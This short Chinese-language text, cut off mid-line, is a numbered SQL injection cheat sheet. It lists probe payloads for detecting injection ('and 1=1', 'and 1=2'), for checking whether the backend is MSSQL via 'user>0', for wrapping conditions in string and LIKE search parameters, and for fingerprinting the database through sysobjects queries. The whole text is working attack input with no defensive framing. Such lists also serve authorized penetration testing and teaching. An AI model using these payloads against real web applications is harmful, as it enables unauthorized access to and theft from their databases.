• 1.判断是否有注入;and 1=1 ;and 1=2

    2.初步判断是否是mssql ;and user>0

    3.注入参数是字符'and [查询条件] and ''='

    4.搜索时没过滤参数的'and [查询条件] and '%25'='

    5.判断数据库系统
    ;and (select count(*) from sysobjects)>0 mssql
    ;and (sele...